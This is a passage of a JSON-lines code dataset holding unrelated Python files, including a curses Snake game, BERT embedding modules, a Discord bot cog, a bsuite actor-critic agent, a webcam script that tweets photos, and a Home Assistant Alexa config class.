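assert r.getBudget() == 100.0
assert r.purchase(m.sell_price, (3, 4), m.size) is True     # distance 5.0 <= sqrt(40)
assert r.purchase(m.sell_price, (5, 5), m.size) is False    # distance ~7.07 is too far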
direction == 1:\n head[0] += 1\n if direction == 3:\n head[0] -= 1\n \n deadcell = body[-1][:]\n for z in range(len(body)-1,0,-1):\n body[z] = body[z-1][:]\n\n body[0] = head[:]\n\n #check for border and collions\n if screen.inch(head[0],head[1]) != ord(' '):\n if screen.inch(head[0],head[1]) == ord('$'):\n foodmade = False\n\n for i in range(growlength):\n body.append(body[-1])\n\n else:\n gameover = True\n screen.refresh()\n if not accelration:\n time.sleep(speed[difficulty])\n else:\n time.sleep(15.*speed[difficulty]/len(body))\n\n\n screen.clear()\n screen.nodelay(0)\n message1 = \"Game Over\"\n message2 = 'Your Score is '+ str(int((len(body)-startlength)/growlength))\n message3 = 'Press Space to play again'\n message4 = 'Press Enter to quit'\n message5 = 'Press M to go back to the menu'\n screen.addstr(int(h/2-1),int((w-len(message1))/2),message1)\n screen.addstr(int(h/2),int((w-len(message2))/2),message2)\n screen.addstr(int(h/2+1),int((w-len(message3))/2),message3)\n screen.addstr(int(h/2+2),int((w-len(message4))/2),message4)\n screen.addstr(int(h/2+3),int((w-len(message5))/2),message5)\n\n screen.refresh()\n while q not in [32,10,77,109]:\n q = screen.getch()\n\n if q== 32:\n screen.clear()\n game()\n elif q == 10:\n curses.endwin()\n elif q in [77,109]:\n menu()\n\ndef menu():\n connect_server() #connect to the server\n global s # our socket\n\n screen.nodelay(0)\n screen.clear()\n curses.noecho()\n curses.curs_set(0)# cursor visibility zero\n selection = -1\n option = 0\n\n while selection < 0:\n\n graphics = [0]*5\n graphics[option] = curses.A_REVERSE\n screen.addstr(int(0),int(w/2-3), 'Snake')\n screen.addstr(int(h/2-2),int(w/2-2),'Play',graphics[0])\n screen.addstr(int(h/2-1),int(w/2-6),'Instructions',graphics[1])\n screen.addstr(int(h/2),int(w/2-6),'Game Options',graphics[2])\n screen.addstr(int(h/2+1),int(w/2-5),'High Scores',graphics[3])\n screen.addstr(int(h/2+2),int(w/2-2),'Exit',graphics[4])\n screen.refresh()\n action = screen.getch()\n if action == curses.KEY_UP:\n option = (option-1) %5\n if action == curses.KEY_DOWN:\n option = (option+1) %5\n if action == ord('\\n'):\n selection = option\n \n if selection == 0:\n game()\n elif selection ==1:\n instructions()\n elif selection ==2:\n gameoptions()\n\ndef instructions():\n screen.clear()\n screen.nodelay(0)\n lines = ['Use arrow keys to move','dont run into yourself or the snake',' ','Press any key to go back']\n \n z = 0\n for z in range(len(lines)):\n screen.addstr(int((h-len(lines))/2+z),int((w-len(lines[z]))/2),lines[z])\n \n screen.refresh()\n screen.getch()\n menu()\n\ndef gameoptions():\n global startlength,growlength,difficulty,accelration\n screen.clear()\n selection = -1\n option = 0\n\n while selection < 4:\n screen.clear()\n graphics = [0]*5\n graphics[option] = curses.A_REVERSE\n strings = ['Starting snake length: '+ str(startlength),'Snake Growth rate: '+str(growlength),'Difficulty: '+ str(difficulty),'Accelration: '+ str(accelration),'Exit']\n for z in range(len(strings)):\n screen.addstr(int((h-len(strings))/2+z),int((w-len(strings[z]))/2),strings[z],graphics[z])\n screen.refresh()\n action = screen.getch()\n\n if action == curses.KEY_UP:\n option = (option-1) %5\n if action == curses.KEY_DOWN:\n option = (option+1) %5\n if action == ord('\\n'):\n selection = option\n if action == curses.KEY_RIGHT:\n\n if option ==0 and startlength <20:\n startlength +=1\n elif option ==1 and growlength <10:\n growlength +=1\n\n if action == curses.KEY_LEFT:\n\n if option ==0 and startlength >3:\n startlength -=1\n elif 
option ==1 and growlength >1:\n growlength -=1\n\n\n if selection == 3:\n accelration = not accelration\n if selection == 2:\n if difficulty =='Easy':\n difficulty = 'Medium'\n elif difficulty == 'Medium':\n difficulty = 'Hard'\n else:\n difficulty = 'Easy'\n if selection < 4:\n selection = -1\n\n menu()\n\n\nmenu()\ncurses.endwin()","sub_path":"assignment2/snake IO/snake_multi.py","file_name":"snake_multi.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63151784","text":"\"\"\" Q4: Write a Python Program to find the factors of a number \"\"\"\n\nimport time\nfrom question2 import input_positive_integer\n\n\ndef factors(num):\n \"\"\" Accepts a string and return a list of factors of the number. \"\"\"\n i = 1\n lst = []\n head = i\n tail = num\n while i <= num:\n head = i\n if tail <= head:\n break\n if num % i == 0:\n tail = num/i\n lst.append(i)\n lst.append(tail)\n i += 1\n return lst\n\n\nif __name__ == \"__main__\":\n number = input_positive_integer(\"Enter any positive integer : \")\n start_time = time.time()\n print(\"Factors of '{0}' are {1}\".format(number, factors(number)))\n print(\"Time Taken is '%s' Seconds\" % (time.time() - start_time))\n","sub_path":"Python/Assignment9/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102698715","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Parameter\nfrom torch.nn.utils.rnn import pad_sequence\nfrom transformers import BertModel\nfrom transformers import BertTokenizer\n\n\nclass ScalarMix(torch.nn.Module):\n def __init__(self, mixture_size=4):\n super(ScalarMix, self).__init__()\n self.mixture_size = mixture_size\n self.scalar_parameters = Parameter(torch.ones(mixture_size))\n self.gamma = Parameter(torch.tensor(1.0))\n\n def forward(self, layers):\n normed_weights = F.softmax(self.scalar_parameters, dim=0)\n return self.gamma * sum(\n weight * tensor for weight, tensor in zip(normed_weights, layers)\n )\n\n\nclass Bert_Embedding(nn.Module):\n def __init__(self, bert_path, bert_layer, bert_dim, freeze=True):\n super(Bert_Embedding, self).__init__()\n self.bert_layer = bert_layer\n self.bert = BertModel.from_pretrained(bert_path, output_hidden_states=True)\n print(self.bert.config)\n self.scalar_mix = ScalarMix(bert_layer)\n\n if freeze:\n self.freeze()\n\n def forward(self, subword_idxs, subword_masks, token_starts_masks, text_masks, subwords_mask):\n self.eval()\n sen_lens = token_starts_masks.sum(dim=1)\n _, _, bert_outs = self.bert(\n subword_idxs,\n attention_mask=subword_masks\n ) # tuple([Batch_size, max_sentence_length, dim])\n bert_outs = bert_outs[-self.bert_layer:]\n bert_outs = self.scalar_mix(bert_outs)\n # bert_outs = torch.split(bert_outs[token_starts_masks], sen_lens.tolist())\n # bert_outs = pad_sequence(bert_outs, batch_first=True)\n zeros = bert_outs.new_zeros(*subwords_mask.size(), bert_outs.size(-1))\n zeros.masked_scatter_(subwords_mask.unsqueeze(-1), bert_outs[text_masks])\n subwords_lens = subwords_mask.sum(-1)\n subwords_lens += (subwords_lens == 0).type(subwords_lens.type()) # 0.0 / 0 -> 0.0 / 1\n bert_outs = zeros.sum(2) / subwords_lens.unsqueeze(-1)\n return bert_outs\n\n def freeze(self):\n for para in self.bert.parameters():\n para.requires_grad = False\n\n\nclass Bert_Encoder(nn.Module):\n def __init__(self, bert_path, 
bert_layer, freeze=False, fix_layer_number=None):\n super(Bert_Encoder, self).__init__()\n self.bert = BertModel.from_pretrained(bert_path, output_hidden_states=True)\n self.bert_layer = bert_layer\n\n if freeze:\n self.freeze()\n if fix_layer_number is not None:\n self.fix_several_layers(fix_layer_number)\n\n def forward(self, subword_idxs, subword_masks, token_starts_masks, text_masks, subwords_mask):\n sen_lens = token_starts_masks.sum(dim=1)\n _, _, bert_outs = self.bert(\n subword_idxs,\n token_type_ids=None,\n attention_mask=subword_masks,\n )\n bert_outs = bert_outs[-1] # the last layer of BERT outputs\n # bert_outs = torch.split(bert_outs[token_starts_masks], sen_lens.tolist())\n zeros = bert_outs.new_zeros(*subwords_mask.size(), bert_outs.size(-1))\n zeros.masked_scatter_(subwords_mask.unsqueeze(-1), bert_outs[text_masks])\n bert_outs = pad_sequence(zeros, batch_first=True)\n subwords_lens = subwords_mask.sum(-1)\n subwords_lens += (subwords_lens == 0).type(subwords_lens.type()) # 0.0 / 0 -> 0.0 / 1\n bert_outs = bert_outs.sum(2) / subwords_lens.unsqueeze(-1)\n return bert_outs\n\n def freeze(self):\n for para in self.bert.parameters():\n para.requires_grad = False\n\n def fix_several_layers(self, layer_numer):\n fixed_layer_names = [\"embeddings\"] if layer_numer >= 0 else []\n for i in range(layer_numer):\n fixed_layer_names.append(\"encoder.layer.\" + str(i) + '.')\n print(\"{} will be fixed\".format(fixed_layer_names))\n for name, para in self.bert.named_parameters():\n for layer_name in fixed_layer_names:\n if layer_name in name:\n para.requires_grad = False\n break\n\n\nclass Vocab(object):\n def __init__(self, bert_vocab_path):\n self.tokenizer = BertTokenizer.from_pretrained(\n bert_vocab_path, do_lower_case=False\n )\n\n def numericalize(self, seqs, training=True):\n subwords, masks, starts = [], [], []\n text_masks, subwords_mask = [], []\n\n for seq in seqs:\n seq = [self.tokenizer.tokenize(token) for token in seq]\n seq = [piece if piece else [\"[PAD]\"] for piece in seq]\n seq = [[\"[CLS]\"]] + seq + [[\"[SEP]\"]]\n lengths = [0] + [len(piece) for piece in seq]\n # flatten the word pieces\n tokens = sum(seq, [])\n # subwords indexes\n token_idx = torch.tensor(self.tokenizer.convert_tokens_to_ids(tokens))\n subwords.append(token_idx)\n\n # subword masks\n mask = torch.ones(len(tokens), dtype=torch.bool)\n masks.append(mask)\n # subword text mask\n text_mask = torch.BoolTensor([0] + [1] * (len(tokens) - 2) + [0])\n text_masks.append(text_mask)\n\n # record the start position of all words\n start_idxs = torch.tensor(lengths).cumsum(0)[1:-2] # bos:0 eos:-2\n # subword start masks\n start_mask = torch.zeros(len(tokens), dtype=torch.bool)\n start_mask[start_idxs] = 1\n starts.append(start_mask)\n\n # record the start and last position of all words\n start_end_idxs = torch.tensor(lengths).cumsum(0)[1:-1]\n subword_mask = [torch.ones(start_end_idxs[i + 1] - start_end_idxs[i])\n for i in range(len(start_end_idxs) - 1)]\n subword_mask = pad_sequence(subword_mask, batch_first=True)\n subwords_mask.append(subword_mask)\n max_subword_length = max(m.size(-1) for m in subwords_mask)\n max_sentence_length = max(m.size(0) for m in subwords_mask)\n subwords_mask = [F.pad(mask, (0, max_subword_length - mask.size(1), 0, max_sentence_length - mask.size(0)))\n for mask in subwords_mask] # [left, right, top, down]\n subwords_mask = torch.stack(subwords_mask)\n return subwords, masks, starts, text_masks, subwords_mask\n\n\nclass BERT_input(nn.Module):\n def __init__(self, bert_vocab_path, 
bert_path, bert_layer, bert_dim):\n super(BERT_input, self).__init__()\n self.vocab = Vocab(bert_vocab_path)\n self.bert_input = Bert_Embedding(bert_path, bert_layer, bert_dim)\n\n def forward(self, seqs):\n subwords, masks, starts, text_masks, subwords_mask = self.vocab.numericalize(seqs)\n subwords = pad_sequence(subwords, batch_first=True).cuda()\n masks = pad_sequence(masks, batch_first=True).cuda()\n starts = pad_sequence(starts, batch_first=True).cuda()\n text_masks = pad_sequence(text_masks, batch_first=True).type(torch.BoolTensor).cuda()\n subwords_mask = subwords_mask.type(torch.BoolTensor).cuda()\n bert_outs = self.bert_input.forward(subwords, masks, starts, text_masks, subwords_mask)\n return bert_outs\n\n\nclass BERT_model(nn.Module):\n def __init__(self, bert_vocab_path, bert_path, bert_layer, bert_dim, fix_layer_number=None):\n super(BERT_model, self).__init__()\n self.vocab = Vocab(bert_vocab_path)\n self.bert_encoder = Bert_Encoder(bert_path, bert_layer,\n freeze=False, fix_layer_number=fix_layer_number)\n\n def forward(self, seqs):\n subwords, masks, starts, text_masks, subwords_mask = self.vocab.numericalize(seqs)\n subwords = pad_sequence(subwords, batch_first=True).cuda()\n masks = pad_sequence(masks, batch_first=True).cuda()\n starts = pad_sequence(starts, batch_first=True).type(torch.BoolTensor).cuda()\n text_masks = pad_sequence(text_masks, batch_first=True).type(torch.BoolTensor).cuda()\n subwords_mask = subwords_mask.type(torch.BoolTensor).cuda()\n bert_outs = self.bert_encoder.forward(subwords, masks, starts, text_masks, subwords_mask)\n return bert_outs\n","sub_path":"src/orl-4.1-ultimate-hard-e2e/neural_srl/pytorch/pre_trained_language_model.py","file_name":"pre_trained_language_model.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"283617275","text":"def fibb_rekurencyjnie(n):\n if n<=1 or n==2:\n return 1\n else:\n tmp = fibb_rekurencyjnie(n-1) + fibb_rekurencyjnie(n-2)\n return tmp\n\ndef fibb_iteracyjnie(n):\n liczba_n_1 = 1\n liczba_n_2 = 1\n \n for i in range(n-1):\n liczba_n_2 += liczba_n_1\n liczba_n_1 = liczba_n_2-liczba_n_1\n \n return liczba_n_1\n \nx = int(input(\"Podaj n: \"))\n\nwynik = fibb_rekurencyjnie(x)\nwynik2 = fibb_iteracyjnie(x)\n\nprint(\"rek: fibb = \",wynik)\nprint(\"iter: fibb = \",wynik2)","sub_path":"WDI/Zajecia4/Zadanie2.py","file_name":"Zadanie2.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"88651626","text":"'''Remove premium from a server'''\n\nfrom discord.ext import commands\nfrom packages.utils import Embed, ImproperType\nfrom mongoclient import DBClient\nclass Command(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n \n @commands.command()\n async def removepremium(self, ctx):\n #return await ctx.send('This command is currently under maintenance. The developers will try to get it up again as soon as possible. In the meantime feel free to use `n.help` to get the other commands. Thank you for your understanding!')\n if (ctx.author.id) not in [396075607420567552, 505338178287173642, 637638904513691658]:\n embed = Embed('Error!', 'You\\'re not a developer of this bot! 
Click [here](https://www.latlmes.com/entertainment/dev-application-1) to apply for dev.', 'warning')\n\n embed.footer(f'⚙️This command is a 🛠️developer🛠️ only command.⚙️', 'https://cdn.discordapp.com/attachments/719414661686099993/754971786231283712/season-callout-badge.png')\n\n return await embed.send(ctx)\n #data = json.loads(requests.get('https://test-db.nitrotypers.repl.co', data={'key': os.getenv('DB_KEY')}).text)\n dbclient = DBClient()\n collection = dbclient.db.premium\n data = await dbclient.get_big_array(collection, 'premium')\n for x in data['premium']:\n if x['serverID'] == str(ctx.author.guild.id):\n data['premium'].pop(data['premium'].index(x))\n break\n #requests.post('https://test-db.nitrotypers.repl.co', data={'key': os.getenv('DB_KEY'), 'data': json.dumps(data)})\n await dbclient.update_big_array(collection, 'premium', data)\n embed = Embed('Success!', f'Server {str(ctx.author.guild.id)} has been removed from premium!', 'white_check_mark')\n embed.footer(f'⚙️This command is a 🛠️developer🛠️ only command.⚙️', 'https://cdn.discordapp.com/attachments/719414661686099993/754971786231283712/season-callout-badge.png')\n await embed.send(ctx)\n try:\n await ctx.message.delete()\n except:\n pass\n \ndef setup(client):\n client.add_cog(Command(client))","sub_path":"commands/dev/removepremium.py","file_name":"removepremium.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"111916273","text":"# pylint: disable=g-bad-file-header\n# Copyright 2019 DeepMind Technologies Limited. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"A simple TensorFlow-based implementation of a recurrent actor-critic.\n\nReferences:\n1. \"Simple Statistical Gradient-Following Algorithms for Connectionist\n Reinforcement Learning\" (Williams, 1992).\n2. \"Long Short-Term Memory\" (Hochreiter, 1991).\n\nLinks:\n1. http://www-anw.cs.umass.edu/~barto/courses/cs687/williams92simple.pdf.\n2. 
https://www.bioinf.jku.at/publications/older/2604.pdf\n\"\"\"\n\n# Import all packages\n\nfrom bsuite.baselines import base\nimport dm_env\nfrom dm_env import specs\nimport numpy as np\nimport sonnet as snt\nimport tensorflow as tf\nfrom trfl.discrete_policy_gradient_ops import discrete_policy_gradient_loss\nfrom trfl.value_ops import td_lambda as td_lambda_loss\nfrom typing import Sequence\n\nnest = tf.contrib.framework.nest\n\n\nclass ActorCriticRNN(base.Agent):\n \"\"\"A recurrent TensorFlow-based feedforward actor-critic implementation.\"\"\"\n\n def __init__(\n self,\n obs_spec: specs.Array,\n action_spec: specs.DiscreteArray,\n network: snt.RNNCore,\n optimizer: tf.train.Optimizer,\n sequence_length: int,\n td_lambda: float,\n agent_discount: float,\n seed: int,\n ):\n \"\"\"A recurrent actor-critic agent.\"\"\"\n del action_spec # unused\n tf.set_random_seed(seed)\n self._sequence_length = sequence_length\n self._num_transitions_in_buffer = 0\n\n # Create the policy ops.\n obs = tf.placeholder(shape=(1,) + obs_spec.shape, dtype=obs_spec.dtype)\n mask = tf.placeholder(shape=(1,), dtype=tf.float32)\n state = self._placeholders_like(network.initial_state(batch_size=1))\n (online_logits, _), next_state = network((obs, mask), state)\n action = tf.squeeze(tf.multinomial(online_logits, 1, output_dtype=tf.int32))\n\n # Create placeholders and numpy arrays for learning from trajectories.\n shapes = [obs_spec.shape, (), (), (), ()]\n dtypes = [obs_spec.dtype, np.int32, np.float32, np.float32, np.float32]\n\n placeholders = [\n tf.placeholder(shape=(self._sequence_length, 1) + shape, dtype=dtype)\n for shape, dtype in zip(shapes, dtypes)]\n observations, actions, rewards, discounts, masks = placeholders\n\n # Build actor and critic losses.\n (logits, values), final_state = tf.nn.dynamic_rnn(\n network, (observations, tf.expand_dims(masks, -1)),\n initial_state=state, dtype=tf.float32, time_major=True)\n (_, bootstrap_value), _ = network((obs, mask), final_state)\n values, bootstrap_value = nest.map_structure(\n lambda t: tf.squeeze(t, axis=-1), (values, bootstrap_value))\n critic_loss, (advantages, _) = td_lambda_loss(\n state_values=values,\n rewards=rewards,\n pcontinues=agent_discount * discounts,\n bootstrap_value=bootstrap_value,\n lambda_=td_lambda)\n actor_loss = discrete_policy_gradient_loss(logits, actions, advantages)\n\n # Updates.\n grads_and_vars = optimizer.compute_gradients(actor_loss + critic_loss)\n grads, _ = tf.clip_by_global_norm([g for g, _ in grads_and_vars], 5.)\n grads_and_vars = [(g, pair[1]) for g, pair in zip(grads, grads_and_vars)]\n train_op = optimizer.apply_gradients(grads_and_vars)\n\n # Create TF session and callables.\n session = tf.Session()\n self._reset_fn = session.make_callable(\n network.initial_state(batch_size=1))\n self._policy_fn = session.make_callable(\n [action, next_state], [obs, mask, state])\n self._update_fn = session.make_callable(\n [train_op, final_state], placeholders + [obs, mask, state])\n session.run(tf.global_variables_initializer())\n\n # Initialize numpy buffers\n self.state = self._reset_fn()\n self.update_init_state = self._reset_fn()\n self.arrays = [\n np.zeros(shape=(self._sequence_length, 1) + shape, dtype=dtype)\n for shape, dtype in zip(shapes, dtypes)]\n\n def _placeholders_like(self, tensor_nest):\n \"\"\"Create placeholders with given nested structure, shape, and type.\"\"\"\n return nest.map_structure(\n lambda t: tf.placeholder(shape=t.shape, dtype=t.dtype), tensor_nest)\n\n def _compute_entropy_loss(self, logits):\n 
\"\"\"Compute entropy loss for a set of policy logits.\"\"\"\n policy = tf.nn.softmax(logits)\n log_policy = tf.nn.log_softmax(logits)\n return -tf.reduce_sum(-policy * log_policy)\n\n def policy(self, timestep: dm_env.TimeStep) -> base.Action:\n \"\"\"Selects actions according to the latest softmax policy.\"\"\"\n action, self.state = self._policy_fn(\n np.expand_dims(timestep.observation, 0),\n np.expand_dims(float(not timestep.first()), 0),\n self.state)\n return np.int32(action)\n\n def update(self, old_step: dm_env.TimeStep, action: base.Action,\n new_step: dm_env.TimeStep):\n \"\"\"Receives a transition and performs a learning update.\"\"\"\n\n # Insert this step into our rolling window 'batch'.\n items = [\n old_step.observation, action, new_step.reward, new_step.discount,\n float(not old_step.step_type.first())]\n for buf, item in zip(self.arrays, items):\n buf[self._num_transitions_in_buffer % self._sequence_length, 0] = item\n self._num_transitions_in_buffer += 1\n\n # When the batch is full, do a step of SGD.\n if self._num_transitions_in_buffer % self._sequence_length == 0:\n _, self.update_init_state = self._update_fn(*(self.arrays + [\n np.expand_dims(new_step.observation, 0),\n np.expand_dims(float(not new_step.step_type.first()), 0),\n self.update_init_state]))\n\n\nclass PolicyValueRNN(snt.RNNCore):\n \"\"\"A recurrent multilayer perceptron with a value and a policy head.\"\"\"\n\n def __init__(self, hidden_sizes: Sequence[int], num_actions: int):\n self._num_actions = num_actions\n super(PolicyValueRNN, self).__init__(name='policy_value_net')\n with self._enter_variable_scope():\n self._torso = snt.nets.MLP(hidden_sizes, activate_final=True, name='net')\n self._core = snt.LSTM(hidden_sizes[-1], name='rnn')\n self._policy_head = snt.Linear(num_actions, name='policy')\n self._value_head = snt.Linear(1, name='value')\n\n def _build(self, inputs_and_mask, state):\n inputs, mask = inputs_and_mask\n inputs = snt.BatchFlatten()(inputs)\n hiddens = self._torso(inputs)\n state = state._replace(hidden=state.hidden*mask, cell=state.cell*mask)\n lstm_output, next_state = self._core(inputs, state)\n lstm_output = tf.nn.relu(lstm_output) + hiddens # skip connection\n logits = self._policy_head(lstm_output)\n value = self._value_head(lstm_output)\n return (logits, value), next_state\n\n @property\n def state_size(self):\n \"\"\"Forward size(s) of state(s) used by the wrapped core.\"\"\"\n return self._core.state_size\n\n @property\n def output_size(self):\n \"\"\"Forward size of outputs produced by the wrapped core.\"\"\"\n return (self._num_actions, 1)\n\n def initial_state(self, *args, **kwargs):\n \"\"\"Creates the core initial state.\"\"\"\n return self._core.initial_state(*args, **kwargs)\n\n\ndef default_agent(obs_spec: specs.Array,\n action_spec: specs.DiscreteArray):\n \"\"\"Initialize a DQN agent with default parameters.\"\"\"\n network = PolicyValueRNN(\n hidden_sizes=[64, 64],\n num_actions=action_spec.num_values,\n )\n return ActorCriticRNN(\n obs_spec=obs_spec,\n action_spec=action_spec,\n network=network,\n optimizer=tf.train.AdamOptimizer(learning_rate=3e-3),\n sequence_length=32,\n td_lambda=0.9,\n agent_discount=0.99,\n seed=42,\n )\n","sub_path":"bsuite/baselines/actor_critic_rnn/actor_critic_rnn.py","file_name":"actor_critic_rnn.py","file_ext":"py","file_size_in_byte":8137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49951980","text":"import cv2\nimport os\nimport numpy as np\nfrom keras.models import 
Sequential\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dense, Flatten, Dropout\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.datasets import mnist\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.utils import np_utils\nfrom random import sample\nfrom keras.models import model_from_json\nimport psutil\nimport easygui\nfrom tweet import post_picture\nfrom time import sleep, time\nfrom datetime import datetime\nfrom audio import bark\nfrom url import get_url\nfrom model import predict\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"a\", nargs='?', default=\"empty\")\nargs = parser.parse_args()\n\n \np = psutil.Process(os.getpid())\np.nice(19) # set>>> p.nice()10\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n \ncam = cv2.VideoCapture(0) \n\n\npath = '/home/felipe/final'\n\nwait = 0\nWAIT_TURNS = 240\n\nSCORE_THRESHOLD = 0.90 # > \nSOUND_THRESHOLD = 0.90\ntime_init = time()\ntime_end = 0\n\npic_enabled = True\n\nold_sound = 0\n\ncommand_delay = 0\n\ncommand = \"Init\"\n\npic_ok = \"O\"\n\nloop = 20\n\nwhile True:\n\n score = 0\n \n pic_ok = \"O\"\n \n now = datetime.now() \n time_taken = time() \n \n current_sound = bark()\n \n dif = current_sound - old_sound\n \n if dif >= 0:\n \n sound = dif\n \n else:\n \n sound = 0 \n \n print(\"Sound:\", '{:04f}'.format(sound))\n \n \n s, img = cam.read()\n \n if args.a == 'nocam':\n \n pass\n \n else:\n \n cv2.imshow(\"Cam\", img)\n cv2.waitKey(1) \n \n time_id = '{:02d}'.format(now.day)+\"-\"+'{:02d}'.format(now.month)+\"-\"+str(now.year)+\"-\"+'{:02d}'.format(now.hour)+\":\"+'{:02d}'.format(now.minute)+\":\"+'{:02d}'.format(now.second)\n \n if sound > SOUND_THRESHOLD:\n \n score = predict(img) \n \n print(\"W:\", str(wait).zfill(2), \"Score:\", '{:04f}'.format(score), \"Sound:\", '{:04f}'.format(sound), \"Time:\", time_id)\n \n \n if now.hour < 20 and now.hour > 6:\n \n if score > SCORE_THRESHOLD and wait == 0:\n \n cv2.imwrite(path+\"/auto_tweet.png\",img)\n \n pic_ok = \"X\"\n\n wait = WAIT_TURNS\n \n try:\n \n print(\"Postando foto\")\n \n if pic_enabled:\n \n post_picture(path+\"/auto_tweet.png\")\n \n except:\n \n print(\"Corrigir\")\n \n \n if wait > 0:\n \n wait -= 1 \n \n \n f = open(\"report.txt\", 'a')\n\n f.write(\"W: \"+ str(wait).zfill(2) + \" \" + str(time_id) + \" S: \" + '{:04f}'.format(score) + \" V: \" + '{:04f}'.format(sound) + \" \" + pic_ok + \"\\n\")\n\n f.close() \n\n\n\n command_delay = (command_delay + 1) % loop\n \n if command_delay == 0:\n \n try:\n command = get_url() \n if command == \"reboot\" or command == \"Reboot\":\n os.system(\"reboot\") \n elif command == \"shutdown\" or command == \"Shutdown\":\n os.system(\"shutdown now\")\n elif command == \"enable\" or command == \"Enable\":\n pic_enabled = True \n elif command == \"disable\" or command == \"Disable\":\n pic_enabled = False \n except: \n pass\n \n time_end = time() \n \n \n print('{:04f}'.format(time_end - time_taken), \"Segundos \", \"Comando:\", command, \"-\", command_delay, \"Time:\", time_id) \n \n f = open(\"last_run.txt\",\"w\")\n f.write(time_id+\"\\n\")\n f.close()\n \n old_sound = sound\n","sub_path":"cam_model.py","file_name":"cam_model.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559363521","text":"\"\"\"Config helpers for Alexa.\"\"\"\nfrom abc import ABC, abstractmethod\n\nfrom 
homeassistant.core import callback\n\nfrom .state_report import async_enable_proactive_mode\n\n\nclass AbstractConfig(ABC):\n \"\"\"Hold the configuration for Alexa.\"\"\"\n\n _unsub_proactive_report = None\n\n def __init__(self, hass):\n \"\"\"Initialize abstract config.\"\"\"\n self.hass = hass\n\n @property\n def supports_auth(self):\n \"\"\"Return if config supports auth.\"\"\"\n return False\n\n @property\n def should_report_state(self):\n \"\"\"Return if states should be proactively reported.\"\"\"\n return False\n\n @property\n def endpoint(self):\n \"\"\"Endpoint for report state.\"\"\"\n return None\n\n @property\n @abstractmethod\n def locale(self):\n \"\"\"Return config locale.\"\"\"\n\n @property\n def entity_config(self):\n \"\"\"Return entity config.\"\"\"\n return {}\n\n @property\n def is_reporting_states(self):\n \"\"\"Return if proactive mode is enabled.\"\"\"\n return self._unsub_proactive_report is not None\n\n @callback\n @abstractmethod\n def user_identifier(self):\n \"\"\"Return an identifier for the user that represents this config.\"\"\"\n\n async def async_enable_proactive_mode(self):\n \"\"\"Enable proactive mode.\"\"\"\n if self._unsub_proactive_report is None:\n self._unsub_proactive_report = self.hass.async_create_task(\n async_enable_proactive_mode(self.hass, self)\n )\n try:\n await self._unsub_proactive_report\n except Exception:\n self._unsub_proactive_report = None\n raise\n\n async def async_disable_proactive_mode(self):\n \"\"\"Disable proactive mode.\"\"\"\n unsub_func = await self._unsub_proactive_report\n if unsub_func:\n unsub_func()\n self._unsub_proactive_report = None\n\n @callback\n def should_expose(self, entity_id):\n \"\"\"If an entity should be exposed.\"\"\"\n # pylint: disable=no-self-use\n return False\n\n @callback\n def async_invalidate_access_token(self):\n \"\"\"Invalidate access token.\"\"\"\n raise NotImplementedError\n\n async def async_get_access_token(self):\n \"\"\"Get an access token.\"\"\"\n raise NotImplementedError\n\n async def async_accept_grant(self, code):\n \"\"\"Accept a grant.\"\"\"\n raise NotImplementedError\n","sub_path":"homeassistant/components/alexa/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"217337260","text":"from ocs import ocs_agent\nfrom ocs.Lakeshore.Lakeshore240 import Module\nimport random\nimport time\nimport threading\nimport pyrogue as pr\nfrom FpgaTopLevel import *\n\n\nclass Smurf_Agent:\n\n def __init__(self, agent):\n self.agent = agent\n self.lock = threading.Semaphore()\n self.job = None\n\n self.args = {\n \"simGui\": False,\n \"commType\": \"eth-rssi-interleaved\",\n \"ipAddr\": \"192.168.2.20\",\n \"slot\": 2,\n \"pollEn\": True\n }\n self.base = None\n\n def close(self):\n print(\"Closing connection\")\n if self.base is not None:\n self.base.stop()\n\n def try_set_job(self, job_name):\n with self.lock:\n if self.job == None:\n self.job = job_name\n return True, 'ok.'\n return False, 'Conflict: \"%s\" is already running.' 
